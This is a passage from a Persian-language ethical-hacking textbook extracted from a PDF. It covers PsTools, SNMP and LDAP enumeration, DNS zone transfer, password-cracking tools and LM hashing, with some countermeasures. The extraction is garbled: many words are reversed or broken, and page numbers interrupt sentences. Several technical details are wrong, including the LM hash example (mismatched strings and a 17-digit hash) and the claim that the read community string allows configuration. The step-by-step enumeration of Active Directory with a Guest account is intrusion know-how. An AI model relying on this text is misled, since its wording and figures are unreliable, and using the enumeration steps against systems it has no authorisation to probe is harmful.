PsGetSid : ﻧﻤﺎﻳﺶ SID ﻳﻚ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻳﺎ ﻳﻚ ﻛﺎرﺑﺮ

PsKill : ﻗﻮﺘﻣ ﻒ دﺮﻛ ن ﭘﺮدازش ﻫﺎ هدﺎﻔﺘﺳاﺑﺎ زا ﻧﺎم ﻳﺎ ﺷﻤﺎره ﭘﺮدازش

PsInfo : ﻳﺎﻤﻧ ﺶ اﻃﻼﻋﺎت ﺳﻴﺴﺘﻢ

PsList : ﻳﺎﻤﻧ ﺶ اﻃﻼﻋﺎت ﺟ ﻲﺋﺰ درﺑﺎره ﭘﺮدازش ﻫﺎ ﻫﺎ

PsLoggedOn : ﻛﺴﻲ را ﻛﻪ ﺑﺼﻮرت local و از ﻃﺮﻳﻖ ﻣﻨﺎﺑﻊ share وارد ﺷﺪه اﻧﺪ را ﻧﺸﺎن ﻣﻲ دﻫﺪ

PsLogList زا: رﺎﻛ ﺘﺧاﺪﻧا ﻦ رﻛﻮر دﻫﺎي log

PsPasswd ﺮﻴﻴﻐﺗ: ﭘﺴﻮرد اﻛﺎﻧﺖ ﻫﺎ ﻫﺎ

PsService ﺮﺘﻨﻛ: ل ﺳﺮوﻳﺲ ﻫﺎ ﻫﺎ

PsShutdown ﻮﻣﺎﺧ: ش ﺎﻳ هار زاﺪﻧا ي ﺠﻣ دﺪ ﻛﺎﻣﭙﻴﻮﺗﺮ

PsSuspend ﻖﻠﻌﻣ: دﺮﻛ ن ﭘﺮدازش ﻫﺎ ﻫﺎ

PsUptime ﻴﻴﻌﺗ: ﻦ ﺪﻣ ت نﺎﻣز ﺷور ﻦ دﻮﺑ ن ﻴﺳ ﺴﺘﻢ

SNMP Enumeration ﭼﻴﺴﺖ؟

ﻓﺮآﻳﻨﺪي اﺳﺖ ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از SNMP ، ﻣﻄﻤﺌﻦ ﻣﻲ ﺷﻮﻳﻢ ﻛﻪ ﺣﺴﺎب ﻫﺎي ﻛﺎرﺑﺮي روي ﺳﻴﺴﺘﻢ ﻫﺪف وﺟﻮد دارﻧﺪ . SNMP ، از دو ﻧﻮع ﻋﻨﺼﺮ ﻧﺮم اﻓﺰاري ﺑﺮاي ارﺗﺒﺎﻃﺎت اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ : SNMP agent ، ﻛﻪ ﺑﺮ روي دﺳﺘﮕﺎه ﻫﺎي ﺷﺒﻜﻪ ﻗﺮار دارد و SNMP management station ﻛﻪ ﺑﺎ agent ارﺗﺒﺎط ﺑﺮﻗﺮار ﻣﻲ ﻛﻨﺪ . .

ﺑﺴﻴﺎري از دﺳﺘﮕﺎه ﻫﺎي زﻳﺮﺳﺎﺧﺘﻲ ﺷﺒﻜﻪ از ﻗﺒﻴﻞ روﺗﺮﻫﺎ و ﺳﻮﺋﻴﭻ ﻫﺎ و ﻧﻴﺰ ﺳﻴﺴﺘﻢ ﻫﺎي وﻳﻨﺪوزي، ﺷﺎﻣﻞ SNMP agent ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮاي ﻣﺪﻳﺮﻳﺖ ﺳﻴﺴﺘﻢ ﻳﺎ دﺳﺘﮕﺎه اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . SNMP management station ، درﺧﻮاﺳﺘﻲ ﺑﻪ agent ﻫﺎ ارﺳﺎل ﻣﻲ ﻛﻨﺪ و agent ﻫﺎ ﭘﺎﺳﺦ را ﻣﻲ دﻫﻨﺪ . Trap ﻫﺎ ﺑﻪ management station اﺟﺎزه ﻣﻲ ﻨدﻫ ﺪ اﻃﻼﻋﺎت 57

ﻣﻬﻤﻲ ﻛﻪ در ﻧﺮم اﻓﺰار agent رخ دﻫﺪ را ﺑﺪاﻧﺪ از ﻗﺒﻴﻞ رﻳﺴﺘﺎرت ﻳﺎ ﻣﺸﻜﻞ ﻛﺎرت ﺷﺒﻜﻪ . MIB ، ﭘﺎﻳﮕﺎه داده اي از ﻣﺘﻐﻴﺮﻫﺎي ﭘﻴﻜﺮﺑﻨﺪي اﺳﺖ ﻛﻪ در دﺳﺘﮕﺎه ﺷﺒﻜﻪ ﻗﺮار دارد . .

SNMP ، دو ﭘﺴﻮرد دارد ﻛﻪ ﺑﺮاي د ﺳﺘﺮﺳﻲ و ﭘﻴﻜﺮﺑﻨﺪي SNMP agent از management station اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . اوﻟﻴﻦ ﭘﺴﻮرد، read community string ﻧﺎم دارد . اﻳﻦ ﭘﺴﻮرد ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﻪ دﺳﺘﮕﺎه ﻳﺎ ﺳﻴﺴﺘﻢ ﺧﻮد را ﭘﻴﻜﺮﺑﻨﺪي ﻛﻨﻴﺪ . دوﻣﻴﻦ ﭘﺴﻮرد، read/write community string ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد ﻛﻪ ﺑﺮاي ﺗﻐﻴﻴﺮ ﻳﺎ وﻳ ﺮاﻳﺶ ﭘﻴﻜﺮﺑﻨﺪي دﺳﺘﮕﺎه اﺳﺖ . ﺑﻄﻮر ﻛﻠﻲ، read community string ﭘﻴﺶ ﻓﺮض، public اﺳﺖ و read/write community string ﭘﻴﺶ ﻓﺮض، private اﺳﺖ . ﻳﻜﻲ از راﻳﺞ ﺗﺮﻳﻦ ﻣﺸﻜﻼت اﻣﻨﻴﺘﻲ زﻣﺎﻧﻲ ﭘﻴﺶ ﻣﻲ آﻳﺪ ﻛﻪ community string ﻫﺎ ﺑﺼﻮرت ﺗﻨﻈﻴﻤﺎت ﭘﻴﺶ ﻓﺮض ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از اﻳﻦ ﭘﺴﻮردﻫﺎي ﭘﻴﺶ ﻓﺮض ﺑﺮاي ﻣﺸﺎﻫﺪه ﻳﺎ ﺗﻐﻴﻴﺮ ﭘﻴﻜﺮﺑﻨﺪي دﺳﺘﮕﺎه اﺳﺘﻔﺎده ﻛﻨﺪ . .

در ﺳﺎﻳﺖ www.defaultpasssword.com ﻣﻲ ﺗﻮاﻧﻴﺪ ﭘﺴﻮردﻫﺎي ﭘﻴﺶ ﻓﺮض ﺑﺴﻴﺎري از دﺳﺘﮕﺎه ﻫﺎ را ﺑﺒﻴﻨﻴﺪ . .

اﺑﺰارﻫﺎﻳﻲ از ﻗﺒﻴﻞ UNIX Enumeration ، Getif ، SNScan ، Solarwinds ، SNMPutil ﺑﺮاي enumeration اﺳﺘﻔﺎد ه ﻣﻲ ﺷﻮﻧﺪ . .

ﻣﻘﺎﺑﻠﻪ ﺑﺎ SNMP enumeration

ﺳﺎده ﺗﺮﻳﻦ راه ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از SNMP enumeration ، اﻳﻦ اﺳﺖ ﻛﻪ SNMP agent را در ﺳﻴﺴﺘﻢ ﻫﺎي ﻫﺪف، ﺣﺬف ﻛﻨﻴﺪ ﻳﺎ ﺳﺮوﻳﺲ SNMP را ﺧﺎﻣﻮش ﻛﻨﻴﺪ . اﮔﺮ ﻧﻤﻲ ﺗﻮاﻧﻴﺪ SNMP را ﺧﺎﻣﻮش ﻛﻨﻴﺪ، ﭘﺲ ﺑﺎﻳﺴﺘﻲ community string ﻫﺎي ﭘﻴﺶ ﻓﺮض را ﺗﻐﻴﻴﺮ دﻫﻴﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، ﻣﺪﻳﺮ اﻣﻨﻴﺘﻲ ﻣﻲ ﺗﻮاﻧﺪ Group Policy اﻣﻨﻲ را ﭘﻴﺎده ﺳﺎزي ﻛﻨﺪ ﺗﺎ ارﺗﺒﺎﻃﺎت ﻧﺎﺷﻨﺎس SNMP را ﻣﺤﺪود ﻛﻨﺪ . .

اﻧﺘﻘﺎل DNS Zone در وﻳﻨﺪوز 2000

ﻳﻚ zone transfer ﺳﺎده را ﻣﻲ ﺗﻮان ﺑﺎ اﺳﺘﻔﺎده از دﺳﺘﻮر nslookup اﻧﺠﺎم داد . ﻋﺒﺎرت اﺳﺘﻔﺎده از اﻳﻦ دﺳﺘﻮر ﺑﻪ ﻗﺮار زﻳﺮ اﺳﺖ : :

Nslookup ls –d domainname

ﺑﺎ ﻧﺘﺎﻳﺞ nslookup ، ﻫﻜﺮ ﺑﻪ دﻧﺒﺎل رﻛﻮردﻫﺎي زﻳﺮ ﻣﻲ ﮔﺮدد ﺑﺮاي اﻳﻨﻜﻪ آﻧﻬﺎ اﻃﻼﻋﺎت زﻳﺎدﺗﺮي درﺑﺎره ﺳﺮوﻳﺲ ﻫﺎي ﺷﺒﻜﻪ ﻣﻲ دﻫﺪ : : 58

• Global Catalog service (_gc._tcp_) • Domain controllers (_ldap._tcp) • Kerberos authentication (_kerberos._tcp)

ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ آن ﻣﻲ ﺗﻮان از ﻃﺮﻳﻖ properties ﭘﻨﺠﺮه DNS server از آن ﺟﻠﻮﮔﻴﺮي ﻛﺮد . .

ﭘﺎﻳﮕﺎه داده اﻛﺘﻴﻮ داﻳﺮﻛﺘﻮري ، ﭘﺎﻳﮕﺎه داده ﻣﺒﺘﻨﻲ ﺑﺮ LDAP اﺳﺖ . ﺑﻨﺎﺑﺮاﻳﻦ ﻣﻲ ﺗﻮان ﺑﺎ ﻛﻮﺋﺮي ﺳﺎده LDAP ، ﻛﺎرﺑﺮان و ﮔﺮوه ﻫﺎي ﻣﻮﺟﻮد را ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮد . ﺗﻨﻬﺎ ﭼﻴﺰي ﻛﻪ ﺑﺮاي اﻳﻨﻜﺎر ﻻزم اﺳﺖ اﻳﺠ ﺎد ﻳﻚ ﻧﺸﺴﺖ اﺣﺮاز ﻫﻮﻳﺖ از ﻃﺮﻳﻖ LDAP اﺳﺖ . Windows 2000 LDAP client ﻛﻪ ldp.exe ) Active Directory Administration Tool ) ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد، ﺑﻪ ﺳﺮور اﻛﺘﻴﻮ داﻳﺮﻛﺘﻮري ﻣﺘﺼﻞ ﻣﻲ ﺷﻮد و ﻣﺤﺘﻮاي ﭘﺎﻳﮕﺎه داده را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ . ﻣﻲ ﺗﻮاﻧﻴﺪ اﻳﻦ ﻓﺎﻳﻞ را در CD وﻳﻨﺪوز 2000 و در ﻣﺴﻴﺮ Support\Reskit\Netmgmt\Dstool آن را ﭘﻴﺪا ﻛﻨﻴﺪ . .

ﺑﺮاي اﻧﺠﺎم اﻳﻦ ﺣﻤﻠﻪ ﺑﺎﻳﺪ ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم دﻫﻴﺪ : :

.1 ﺑﺎ اﺳﺘﻔﺎده از ldp.exe ﺑﺎ ﭘﻮرت 389 ﺑﻪ ﺳﺮور اﻛﺘﻴﻮ داﻳﺮﻛﺘﻮري ﻣﺘﺼﻞ ﺷﻮﻳﺪ . زﻣﺎﻧﻴﻜﻪ اﺗﺼﺎل ﻛﺎﻣﻞ ﺷﺪ، اﻃﻼﻋﺎت ﺳﺮور ﻧﻤﺎﻳﺶ داده ﻣﻲ ﺷﻮد. .2 در ﻣﻨﻮي Connection ، ﮔﺰﻳﻨﻪ Authentication را اﻧﺘﺨﺎب ﻛﻨﻴﺪ . ﻧﺎم ﻛﺎرﺑﺮي، ﻛﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم داﻣﻴﻦ را ﺗﺎﻳﭗ ﻛﻨﻴﺪ . ﻣﻲ ﺗﻮاﻧﻴﺪ از ﺣﺴﺎب Guest ﻳﺎ ﻫﺮ ﺣﺴﺎب دﻳﮕﺮي اﺳﺘﻔﺎده ﻛﻨﻴﺪ. .3 زﻣﺎﻧﻴﻜﻪ اﺣﺮاز ﻫﻮﻳﺖ ﻛﺎﻣﻞ ﺷﺪ، ﻛﺎرﺑﺮان و ﮔﺮوه ﻫﺎي ﺳﺎﺧﺘﻪ ﺷﺪه را ﺑﺎ اﺳﺘﻔﺎده از ﮔﺰﻳﻨﻪ Search از ﻣﻨﻮي Browse ﺑﺒﻴﻨﻴﺪ . .

اﺑﺰارﻫﺎي زﻳﺮ ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد : :

• JXplorer • LdapMiner • Softerra LDAP Browser • NTP Enumeration • SMTPscan • Asnumber • Lynx • Winfingerprint • IP Tools Scanner • NBTScan • NetViewX • FreeNetEnumerator • Terminal Service Agent • TXDNS • Unicornscan 59

ﭼﻪ ﻣﺮاﺣﻠﻲ در enumeration اﻧﺠﺎم ﻣﻲ ﺷﻮﻧﺪ؟

ﺑﺎﻳﺪ ﻫﻜﺮﻫﺎ در روﻳﻜﺮد ﻫﻚ ﻛﺮدﻧﺸﺎن، ﺑﺼﻮرت روﺷ ﻤﻨﺪ ﻋﻤﻞ ﻛﻨﻨﺪ . ﻣﺮاﺣﻞ زﻳﺮ، ﻣﺜﺎﻟﻲ از آﻧﻬﺎﻳﻲ ﻛﻪ ﻫﻜﺮﻫﺎ ﺑﺮاي آﻣﺎده ﺳﺎزي ﺳﻴﺴﺘﻢ ﻫﺪف ﺑﺮاي ﺣﻤﻠﻪ اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ را ﻧﺸﺎن ﻣﻲ دﻫﺪ : :

.1 ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي را ﺑﺎ اﺳﺘﻔﺎده از enumeration اﺳﺘﺨﺮاج ﻛﻨﻴﺪ. .2 اﻃﻼﻋﺎت دﺳﺘﮕﺎه ﻫﺎ را ﺑﺎ اﺳﺘﻔﺎد ه از null session ﺟﻤﻊ آوري ﻛﻨﻴﺪ. .3 ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار Windows enumeration ، Superscan را اﻧﺠﺎم دﻫﻴﺪ.

60

ﻓﺼﻞ ﭼﻬﺎرم

ﻫﻚ ﺳﻴﺴﺘﻢ

ﻣﻘﺪﻣﻪ

در اﻳﻦ ﻓﺼﻞ، در ﻣﻮرد ﺟﻨﺒﻪ ﻫﺎي ﻣﺨﺘﻠﻒ ﻫﻚ ﺳﻴﺴﺘﻢ ﺑﺤﺚ ﺧﻮاﻫﻴﻢ ﻛﺮد . ﺑﻪ ﻳﺎد ﺑﻴﺎو رﻳﺪ ﻛﻪ ﭼﺮﺧﻪ ﻫﻚ ﺷﺎﻣﻞ ﺷﺶ ﻣﺮﺣﻠﻪ اﺳﺖ . ﻛﻪ در اﻳﻦ ﻓﺼﻞ، در ﻣﻮرد ﭘﻨﺞ ﻣﺮﺣﻠﻪ دﻳﮕﺮ از ﭼﺮخ ﻫﻚ ﻛﻪ ﺷﺎﻣﻞ ﺷﻜﺴﺘﻦ ﭘﺴﻮرد، اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ، اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎ، ﻣﺨﻔﻲ ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ و ﭘﺎك ﻛﺮدن رد ﭘﺎ ﺳا ﺖ ، ﺑﺤﺚ ﺧﻮاﻫﻴﻢ ﻛﺮد . .

ﺗﻜﻨﻴﻚ ﻫﺎي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد

ﭘﺴﻮردﻫﺎ، ﺷﺎه ﻛﻠﻴﺪي از اﻃﻼﻋﺎت ﻣﻮرد ﻧﻴﺎز ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺴ ﺪﻨﺘ . زﻣﺎﻧﻴﻜﻪ ﻛﺎرﺑﺮان، ﭘﺴﻮرد را اﻳﺠﺎد ﻣﻲ ﻛﻨﻨﺪ، ﻣﻌﻤﻮﻻ ﭘﺴﻮردي را اﻧﺘﺨﺎب ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﺷﻜﺴﺘﻦ دارد . ﺑﺴﻴﺎري از ﻣﺮدم، ﭘﺴﻮردي را اﻧﺘ ﺨﺎب ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ ﺳﺎده ﺑﺎﺷﺪ ﻣﺜﻼ ﻧﺎم ﺳﮓ ﺷﺎن را ﺑﻪ ﻋﻨﻮان ﭘﺴﻮرد اﻧﺘﺨﺎب ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ ﺑﻪ ﺧﺎﻃﺮ آوردن آن ﺳﺎده ﺗﺮ ﺑﺎﺷﺪ . ﺑﺨﺎﻃﺮ اﻳﻦ ﻓﺎﻛﺘﻮرﻫﺎي اﻧﺴﺎﻧﻲ، ﺷﻜﺴﺘﻦ ﺑﺴﻴﺎري از ﭘﺴﻮردﻫﺎ ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰ اﺳﺖ و ﻧﻘﻄﻪ آﻏﺎز ي ﺑﺮاي اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ، اﺟ ﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎ، ﻣﺨﻔﻲ ﺳﺎزي ﻓﺎﻳﻞ ﻫﺎ، و از ﺑﻴﻦ ﺑﺮدن ردﭘﺎ ﺑﻪ ﺷﻤﺎر ﻣﻲ رود . ﭘﺴﻮردﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺼﻮرت دﺳﺘﻲ ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ و ﻳﺎ اﻳﻨﻜﻪ ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰارﻫﺎﻳﻲ از ﻗﺒﻴﻞ روش دﻳﻜﺸﻨﺮي ﻳﺎ brute-force ، ﺑﺼﻮرت اﺗﻮﻣﺎﺗﻴﻚ ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ . .

ﺷﻜﺴﺘﻦ دﺳﺘﻲ ﭘﺴﻮرد، ﺷﺎﻣﻞ ﺗﻼش ﺑﺮاي ورود ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎ ﭘﺴﻮردﻫﺎي ﻣﺨﺘﻠﻒ اﺳﺖ . ﻫﻜﺮ ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم ﻣﻲ دﻫﺪ : :

.1 ﺣﺴﺎب ﻛﺎرﺑﺮي ﻣﻌﺘﺒﺮي را ﭘﻴﺪا ﻣﻲ ﻛﻨﺪ ( ﻣﺜﻞ Administrator ﻳﺎ Guest ). .2 ﻟﻴﺴﺘﻲ از ﭘﺴﻮردﻫﺎي ﻣﻤﻜﻦ را ﺗﻬﻴﻪ ﻣﻲ ﻛﻨﺪ. .3 ﭘﺴﻮردﻫﺎ را ﺑﻪ ﺗﺮﺗﻴﺐ اﺣﺘﻤﺎل ﻣﺮﺗﺐ ﻣﻲ ﻛﻨﺪ. .4 ﭘﺴﻮردﻫﺎ را اﻣﺘﺤﺎن ﻣﻲ ﻛﻨﺪ. .5 ﺗﺎ ﺟﺎﺋﻲ اداﻣﻪ ﻣﻲ دﻫﺪ ﻛﻪ ﭘﺴﻮرد ﺻﺤﻴﺢ را ﭘﻴﺪا ﻛﻨﺪ.

62

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻓﺎﻳﻞ اﺳﻜﺮﻳﭙﺘﻲ ﺗﻬﻴﻪ ﻛﻨﺪ ﻛﻪ ﭘﺴﻮردﻫﺎي ﻣﻮﺟﻮد در ﻟﻴﺴﺖ را اﻣﺘﺤﺎن ﻛﻨﺪ . اﻳﻦ روش، ﻛﺮك ﻛﺮدن ﭘﺴﻮرد ﺑﺼﻮرت دﺳﺘﻲ اﺳﺖ ﻛﻪ زﻣﺎن ﮔﻴﺮ اﺳﺖ و در ﺑﺴﻴﺎري از ﻣﻮارد ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰ ﻧﻴﺴﺖ . .

ﻳﻚ روش ﻣﻮﺛﺮ ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد، دﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻞ ﺣﺎوي ﭘﺴﻮردﻫﺎ در ﺳﻴﺴﺘﻢ اﺳﺖ . ﺑﺴﻴﺎري از ﺳﻴﺴﺘﻢ ﻫﺎ، ﭘﺴﻮرد را ﺑﺮاي ذﺧﻴﺮه ﺑﺮ روي ﺳﻴﺴﺘﻢ، hash ﻣﻲ ﻛﻨﺪ . در ﻃﻮل ﻓﺮآﻳﻨﺪ ورود ﺑﻪ ﺳﻴﺴﻴﺘﻢ ، ﻧﺎم ﻛﺎرﺑﺮي ﺑﺎ اﺳﺘﻔﺎده از ﻫﻤﺎن اﻟﮕﻮرﻳﺘﻢ، hash ﻣﻲ ﺷﻮد و ﺳﭙﺲ ﺑﺎ ﭘﺴﻮردي ﻛﻪ ﻗﺒﻼ ﺑﺼﻮرت hash در ﻳﻚ ﻓﺎﻳﻠﻲ ذﺧﻴﺮه ﺷﺪه اﺳﺖ ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﺷﻮد . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺗﻼش ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺟﺎي اﻳﻨﻜﻪ ﭘﺴﻮرد را ﺣﺪس ﺑﺰﻧﺪ، ﺑﻪ اﻟﮕﻮرﻳﺘﻢ hash ﻛﻪ در ﺳﺮور ذﺧﻴﺮه ﺷﺪه اﺳﺖ دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ و ﺑﻪ ﭘﺴﻮردﻫﺎي ذﺧﻴﺮه ﺷﺪه ﺑﺮ روي ﺳﺮور دﺳﺘﺮﺳﻲ داﺷﺘﻪ ﺑﺎﺷﺪ . .

در ﺳﻴﺴﺘﻢ وﻳﻨﺪوزي، ﭘﺴﻮردﻫﺎ در ﻓﺎﻳﻞ SAM و در ﺳ ﻴﺴﺘﻢ ﻟﻴﻨﻮﻛﺴﻲ در ﻓﺎﻳﻞ shadow ذﺧﻴﺮه ﻣﻲ ﺷﻮﻧﺪ . .

اﺑﺰارﻫﺎي ﻫﻚ Legion ، ﺣﺪس زدن ﭘﺴﻮرد را ﺑﺼﻮرت اﺗﻮﻣﺎﺗﻴﻚ در ﻧﺸﺴﺖ ﻫﺎي NetBIOS اﻧﺠﺎم ﻣﻲ دﻫﺪ . ﭼﻨﺪﻳﻦ ﺑﺎزه از آدرس ﻫﺎي IP را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ ﺗﺎ share ﻫﺎي وﻳﻨﺪوزي را ﭘﻴﺪا ﻛﻨﺪ و ﻫﻤﭽﻨﻴﻦ داراي اﺑﺰارﻫﺎي ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي دﺳﺘﻲ ﻧﻴﺰ ﻫﺴﺖ . .

NTInfoScan ، ﻳﻚ اﺳﻜﻨﺮ اﻣﻨﻴﺘﻲ اﺳﺖ ﻛﻪ ﺑﺮاي وﻳﻨﺪوز NT 4.0 اﺳﺖ . NTInfoScan ، اﺳﻜﻨﺮ آﺳﻴﺐ ﭘﺬﻳﺮي اﺳﺖ ﻛﻪ ﮔﺰارش ﻫﺎﻳﻲ ﺑﻪ ﻓﺮﻣﺖ HTML ﺑﺮاي ﻣﺸﻜﻼت اﻣﻨﻴﺘﻲ ﻣﻮﺟﻮد در ﺳﻴﺴﺘﻢ ﻫﺪف ﺗﻮﻟﻴﺪ ﻣﻲ ﻛﻨﺪ . .

Smbbf ، اﺑﺰار ﺑﺮرﺳﻲ SMB اﺳﺖ ﻛﻪ اﺑﺰاري ﺑﺮاي ﺑﺮرﺳﻲ ﭘﺴﻮردﻫﺎ در وﻳﻨﺪوز اﺳﺖ . اﻳﻦ ﻧﺮم اﻓﺰار، در ﻫﺮ دﻗﻴﻘﻪ، 53000 ﭘﺴﻮرد را ﭼﻚ ﻣﻲ ﻛﻨﺪ . .

L0phtCrack ، ﺑﺴﺘﻪ اي ﺑﺮاي ﺑﺮرﺳﻲ و ﺑﺎزﻳﺎﺑﻲ ﭘﺴﻮرد اﺳﺖ . اﻳﻦ ﻧﺮم اﻓﺰار، داراي ﻗﺎﺑﻠﻴﺖ ﻫﺎي ﺣﻤﻼت dictionary ، brute-force ، و hybrid اﺳﺖ . .

John the Ripper ، اﺑﺰاري دﺳﺘﻮري اﺳﺖ ﻛﻪ ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮردﻫﺎي Unix و NT اﺳﺖ . ﭘﺴﻮردﻫﺎي ﺷﻜﺴﺘﻪ ﺷﺪه، ﺑﺼﻮرت case insensitive ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ ﭘﺴﻮرد واﻗﻌﻲ ﻧﺒﺎﺷﻨﺪ . .

63

KerbCrack ، ﺷﺎﻣﻞ دو ﺑﺮﻧﺎﻣﻪ اﺳﺖ : kerbsniff و kerbcrack . ﻛﻪ kerbsniff ﺑﺮاي ﮔﻮش دادن ﺑﻪ ﺷﺒﻜﻪ و ﺑﺪﺳﺖ آوردن ﻻﮔﻴﻦ ﻫﺎي Windows 2000/XP اﺳﺖ و kerbcrack، ﺑﺮاي ﻳﺎﻓﺘﻦ ﭘﺴﻮردﻫﺎي ﻓﺎﻳﻞ ﺑﺪﺳﺖ آﻣﺪه ﺑﺎ اﺳﺘﻔﺎده از ﺣﻤﻼت brute force و dictionary اﺳﺖ .

LanManager Hash

وﻳﻨﺪوز 2000 ، از NT Lan Manager (NTLM) hashing ﺑﺮاي اﻣﻦ ﻛﺮدن ﭘﺴﻮردﻫﺎ در ﻃﻮل ارﺳﺎل اﺳﺘﻔﺎد ﻣﻲ ﻛﻨﺪ . ﺑﺴﺘﻪ ﺑﻪ ﭘﺴﻮرد، NTLM hashing ﻣﻲ ﺗﻮاﻧﺪ ﺿﻌﻴﻒ ﺑﺎﺷﺪ . ﺑﺮاي ﻣﺜﺎل، ﭘﺴﻮرد 123456abcdef ﺿﻌﻴﻒ اﺳﺖ . زﻣﺎﻧﻴﻜﻪ ﭘﺴﻮرد ﺑﺎ اﻟﮕﻮرﻳﺘﻢ NTLM رﻣﺰﮔﺬاري ﺷﺪ اﺑﺘﺪا ﺑﻪ ﺣﺮوف ﺑﺰرگ ﺗﺒﺪﻳﻞ ﻣﻲ ﺷﻮد : 123456ABCDEF . ﭘﺴﻮرد ﺑﺎ ﻛﺎراﻛﺘﺮﻫﺎي blank ﭘﺮ ﻣﻲ ﺷﻮد ﺗﺎ اﻳﻨﻜﻪ ﻃﻮل آن ﺑﻪ 14 ﻛﺎراﻛﺘﺮ ﺑﺮﺳﺪ : __123456ABCDEF . ﻗﺒﻞ از اﻳﻨ ﻜﻪ ﭘﺴﻮرد رﻣﺰ ﺷﻮد، رﺷﺘﻪ 14 ﻛﺎراﻛﺘﺮي ﺑﻪ دو ﺑﺨﺶ ﺗﻘﺴﻴﻢ ﻣﻲ ﺷﻮد : 123456A و __BCDEF . ﻫﺮ رﺷﺘﻪ ﺑﻄﻮر ﺟﺪاﮔﺎﻧﻪ رﻣﺰ ﻣﻲ ﺷﻮد و ﻧﺘﺎﻳﺞ آن ﺑﻪ ﻫﻢ وﺻﻞ ﻣﻲ ﺷﻮﻧﺪ : :

123465A = 6BF11E04AFAB197F

BCDEF__ = F1E9FFDCC75575B15

و ﻧﺘﻴﺠﻪ hash ﺑﻪ ﺻﻮرت 6BF11E04AFAB197F F1E9FFDCC75575B15 ﺧﻮاﻫﺪ ﺑﻮد . .

ﻣﻘﺎﻳﺴﻪ ﭘﺮوﺗﻜﻞ ﻫﺎي NTLM v1 ، LM و NTLM v2

وﻳﮋﮔﻲ NTLM v2 NTLM v1 LM

ﺣﺴﺎﺳﻴﺖ ﻧﺴﺒﺖ ﺑﻪ ﺣﺮوف ﺑﺰرگ و ﻛﻮﭼﻚ ﺧﻴﺮ ﺑﻠﻪ ﺑﻠﻪ ﻃﻮل ﻛﻠﻴﺪ 56bit+56bit hash - - - اﻟﮕﻮرﻳﺘﻢ hash ﭘﺴﻮرد (MD4 MD4 DES (ECB mode ﻃﻮل ﻣﻘﺪار 128bit 128bit 64bit+64bit hash ﻃﻮل ﻛﻠﻴﺪ 128bit 56bit+56bit+16bit 56bit+56bit+16bit C/R اﻟﮕﻮرﻳﺘﻢ HMAC_MD5 DES (ECB mode) DES (ECB mode) C/R ﻃﻮل ﻣﻘﺪار 128bit 64bit+64bit+64bit 64bit+64bit+64bit C/R

64

ﺷﻜﺴﺘﻦ ﭘﺴﻮردﻫﺎي وﻳﻨﺪوز 2000

